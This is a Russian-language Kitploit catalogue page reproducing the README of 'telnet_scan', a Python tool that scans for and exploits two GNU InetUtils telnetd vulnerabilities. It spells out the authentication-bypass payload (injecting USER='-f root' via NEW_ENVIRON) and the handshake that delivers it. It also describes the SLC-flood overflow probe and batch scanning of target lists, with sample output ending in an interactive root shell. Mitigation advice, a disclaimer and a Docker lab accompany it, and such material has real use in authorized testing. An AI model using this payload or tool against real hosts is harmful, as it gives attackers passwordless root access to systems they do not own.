Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
telnet_scan — сканер/эксплойтер CVE-2026-24061 & CVE-2026-32746 | Kitploit
Инструменты/GitHubGitHub/ekomssavior/telnet_scan
Сканеры уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеАутентификацияОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHubekomssavior/telnet_scan

telnet_scan

сканер/эксплойтер CVE-2026-24061 & CVE-2026-32746

Репозиторий
11613 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Сканер уязвимостей Telnet (CVE-2026-24061 и CVE-2026-32746)

License:ek0ms

Инструмент для оценки безопасности на Python, который обнаруживает и (где применимо) эксплуатирует две критические уязвимости в GNU InetUtils telnetd:

  • CVE-2026-24061 – Обход аутентификации через внедрение переменной окружения USER (CVSS 9.8)
  • CVE-2026-32746 – Переполнение буфера до аутентификации в обработчике LINEMODE SLC (CVSS 9.8)

Важное предупреждение

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно. Авторы не несут ответственности за неправомерное использование или ущерб, причинённый этим инструментом. Используйте на свой страх и риск.

image1(1)

Возможности

  • Сканирование одной цели – ввод IP-адресов или доменных имён во время выполнения
  • – загрузка файла с несколькими целями (по одной на строку)
Пакетное сканирование
  • Выборочное тестирование – проверка каждой уязвимости по отдельности или обеих вместе
  • Эксплуатация CVE-2026-24061 – если уязвимость присутствует, инструмент предоставляет интерактивную оболочку root прямо в том же терминале
  • Обнаружение CVE-2026-32746 – определяет уязвимые системы с помощью контролируемого обнаружения сбоев
  • Чистая обработка терминала – оболочка в необработанном режиме с корректным восстановлением при выходе
  • Проверка подключения – различает заблокированные порты, отключённые службы и реальные уязвимости
  • Подробная отладка – установите TELNET_SCAN_VERBOSE=1, чтобы видеть каждый IAC-пакет и пошаговое описание эксплуатации
  • Лабораторная среда Docker – самодостаточная уязвимая цель для безопасного тестирования
  • Установка

    root@kitploit:~
    git clone https://github.com/ekomsSavior/telnet_scan.git
    cd telnet_scan
    chmod +x telnet_scanner.py
    

    Использование

    Базовый запуск

    root@kitploit:~
    python3 telnet_scanner.py
    

    Лаборатория Docker (безопасное тестирование)

    Протестируйте эксплойт на заведомо уязвимой цели, не рискуя реальными системами:

    root@kitploit:~
    cd lab
    docker compose up -d
    cd ..
    python3 telnet_scanner.py
    # Цель: 127.0.0.1, Порт: 2323
    

    Лаборатория запускает уязвимый GNU InetUtils 2.5 telnetd в изолированном контейнере, привязанном только к localhost. Без доступа к сети.

    Подробный режим

    Отладка рукопожатия telnet и точное отображение происходящего на линии:

    root@kitploit:~
    TELNET_SCAN_VERBOSE=1 python3 telnet_scanner.py
    

    Подробный вывод показывает:

    • Каждую отправленную и полученную команду IAC (DO/WILL/SB)
    • Расшифрованные названия опций telnet
    • Дампы полезной нагрузки в шестнадцатеричном виде для подпроверок
    • Пошаговый процесс эксплуатации (6-шаговое рукопожатие)

    IMG_2498

    Работа с одной целью

    1. Выберите опцию 1
    2. Введите цель (IP или домен, например, 192.168.1.100 или example.com)
    3. Укажите порт (по умолчанию 23, если оставить пустым)
    4. Выберите тип теста:
      • 1 – обе уязвимости
      • 2 – только CVE-2026-24061 (обход аутентификации)
      • 3 – только CVE-2026-32746 (переполнение буфера)

    Пакетное сканирование

    1. Создайте файл с целями (по одной на строку) Пример targets.txt:
      root@kitploit:~
      192.168.1.100
      192.168.1.101
      10.0.0.50
      example.com
      # Это строка комментария – игнорируется
      
    2. Выберите опцию 2
    3. Введите имя файла
    4. Укажите порт (по умолчанию 23)
    5. Выберите тип теста (1, 2 или 3)
    6. Сканер:
      • Покажет прогресс для каждой цели
      • Отобразит результаты по мере завершения
      • Предоставит итоговую таблицу в конце

    При получении оболочки

    Если CVE-2026-24061 успешна:

    1. Уязвимость обнаружена
    2. Интерактивная оболочка root появляется непосредственно в том же окне терминала
    3. Вводите команды и сразу видите вывод (например, id, whoami, ls)
    4. Нажмите Ctrl+C, чтобы выйти из оболочки и вернуться в меню сканера
    5. При пакетном сканировании будет предложено выбрать: взаимодействовать с оболочкой или продолжить сканирование

    Никакого отдельного терминала или дополнительных действий не требуется.

    Как это работает

    CVE-2026-24061 – Обход аутентификации

    Эксплойт выполняет точное 6-шаговое рукопожатие telnet для обеспечения совместимости с реальным GNU InetUtils telnetd:

    1. Ожидание согласования сервера – до 15 секунд на обратный DNS и первоначальные опции DO
    2. Ответ WILL – подтверждение TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON
    3. Ожидание SB SEND – запросы подпроверки от сервера
    4. Отправка полезной нагрузки эксплойта – установка USER="-f root" через подпроверку NEW_ENVIRON
    5. Обработка оставшихся обменов – ответы на DO/WILL для SGA, ECHO, LINEMODE, NAWS
    6. Обнаружение оболочки – поиск приглашения # , root@ или $

    Фоновый поток keepalive каждые 2 секунды отправляет IAC NOP, чтобы предотвратить обнаружение EOF функцией ttloop() в telnetd и вызов exit(1) до обработки полезной нагрузки.

    Уязвимый telnetd передаёт -f root в /usr/bin/login, обходя аутентификацию и предоставляя немедленный доступ к оболочке root.

    CVE-2026-32746 – Обнаружение переполнения буфера

    • Согласует опцию LINEMODE (RFC 1184)
    • Отправляет 500+ триплетов SLC (более 1500 байт) для переполнения буфера фиксированного размера
    • Отслеживает сбросы/сбои соединения для подтверждения уязвимости

    Проверка подключения

    • Предварительное сканирование для проверки доступности службы перед попытками эксплуатации
    • Различает:
      • Заблокированные порты (брандмауэр блокирует)
      • Отключённые службы (служба не запущена)
      • Уязвимые службы (успешный эксплойт)

    Пример вывода

    Одиночная цель

    root@kitploit:~
    === Telnet Vulnerability Scanner ===
    1. Scan a single target
    2. Scan targets from file (one IP/hostname per line)
    3. Exit
    
    Choose option: 1
    Port (default 23): 
    
    Which tests to run?
    1. Both
    2. Only CVE-2026-24061 (auth bypass - gives shell if vulnerable)
    3. Only CVE-2026-32746 (buffer overflow detection)
    Choice [1-3]: 1
    Target (IP or domain): 192.168.1.100
    
    [*] Resolved 192.168.1.100 -> 192.168.1.100
    [*] Scanning 192.168.1.100:23...
    
    [*] Checking if service is reachable...
    [+] Service reachable
    
    [*] Testing CVE-2026-24061 (authentication bypass)...
    [!] CVE-2026-24061: VULNERABLE – shell obtained!
    
    ============================================================
    [+] ROOT SHELL OBTAINED! You are now in an interactive root shell.
    [+] Type commands directly here. Press Ctrl+C to exit shell.
    ============================================================
    
    id
    uid=0(root) gid=0(root) groups=0(root)
    

    Вывод подробного режима (частично)

    root@kitploit:~
        [STEP 1/6] Waiting for server negotiation (may take up to 15s)...
        [STEP 1/6] Got 48 bytes: fffb18fffb20fffb23fffb27...
               decoded: IAC DO TERMINAL-TYPE
               decoded: IAC DO TERMINAL-SPEED  
               decoded: IAC DO X-DISPLAY-LOCATION
               decoded: IAC DO NEW-ENVIRON
        [STEP 2/6] Responding WILL to all DO options
        [STEP 3/6] Waiting for SB SEND subnegotiation requests...
        [STEP 4/6] Sending subnegotiation responses...
                   NEW-ENVIRON IS VAR USER VALUE "-f root"  *** EXPLOIT ***
        [STEP 5/6] Handling remaining option negotiations...
        [STEP 5/6] Text received: 'root@vuln-lab:~# '
        [RESULT] SUCCESS: Passwordless root login via USER="-f root" injection
    

    Пакетное сканирование

    root@kitploit:~
    === Telnet Vulnerability Scanner ===
    1. Scan a single target
    2. Scan targets from file (one IP/hostname per line)
    3. Exit
    
    Choose option: 2
    Port (default 23): 
    Enter filename with targets (one per line): targets.txt
    
    Which tests to run?
    1. Both
    2. Only CVE-2026-24061 (auth bypass - gives shell if vulnerable)
    3. Only CVE-2026-32746 (buffer overflow detection)
    Choice [1-3]: 1
    
    [*] Loaded 3 targets from targets.txt
    
    ==================================================
    [1/3] Scanning 192.168.1.100:23
    ==================================================
    [*] Resolved 192.168.1.100 -> 192.168.1.100
    [+] Service reachable
    
    [*] Testing CVE-2026-24061...
    [!] CVE-2026-24061: VULNERABLE – shell obtained!
    
    [?] Shell obtained! Interact now? (y/N): n
    
    [*] Testing CVE-2026-32746...
    [+] Server did not crash; likely not vulnerable
    
    ==================================================
    [2/3] Scanning 192.168.1.101:23
    ==================================================
    [-] Service not reachable on 192.168.1.101:23
    
    ==================================================
    [3/3] Scanning example.com:23
    ==================================================
    [*] Resolved example.com -> 93.184.216.34
    [+] Service reachable
    
    [*] Testing CVE-2026-24061...
    [+] No response received; may still be vulnerable
    
    [*] Testing CVE-2026-32746...
    [!] CVE-2026-32746: VULNERABLE (server crashed)
    
    ============================================================
    SCAN SUMMARY
    ============================================================
    192.168.1.100: VULNERABLE to CVE-2026-24061
    192.168.1.101: Service unreachable
    example.com: VULNERABLE to CVE-2026-32746
    ============================================================
    

    Смягчение

    Если вы обнаружили уязвимые системы, примените следующие исправления:

    1. Обновите GNU InetUtils до версии 2.8 или новее
    2. Отключите telnetd и заблокируйте TCP/23 на сетевых границах
    3. Ограничьте доступ только доверенными сетями
    4. Мониторьте логи на предмет подключений со значениями NEW_ENVIRON USER, начинающимися с -f

    Разработка и тестирование

    Лаборатория Docker

    Прилагаемый каталог lab/ предоставляет безопасную, воспроизводимую тестовую среду:

    root@kitploit:~
    cd lab
    docker compose up -d
    # Подождите ~10 секунд для инициализации telnetd
    python3 ../telnet_scanner.py
    # Цель: 127.0.0.1, Порт: 2323
    

    Возможности лаборатории:

    • GNU InetUtils 2.5, скомпилированный из исходников (уязвимые версии)
    • telnetd запускается внутри изолированного контейнера
    • Привязан только к localhost:2323 – безопасно для разработки
    • Включает тестового пользователя (labuser:labpass123) для отладки

    Остановите лабораторию по завершении:

    root@kitploit:~
    cd lab && docker compose down
    

    Известные ограничения

    • Тест переполнения (CVE-2026-32746) может вызвать сбой уязвимой службы telnetd
    • Клавиши со стрелками и изменение размера терминала не полностью поддерживаются в интерактивной оболочке
    • Некоторые брандмауэры или сетевые конфигурации могут мешать согласованию опций Telnet
    • Пользователи Windows: интерактивная оболочка требует терминал, подобный Unix (WSL, Cygwin или Linux/macOS)

    image0(2)

    Благодарности

    Особая благодарность @leetcrypt – Правильное 6-шаговое рукопожатие, поток keepalive, подробный режим и лаборатория Docker – это круто!


    ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: предназначено только для авторизованного тестирования безопасности и образовательных целей.

    Скачать инструмент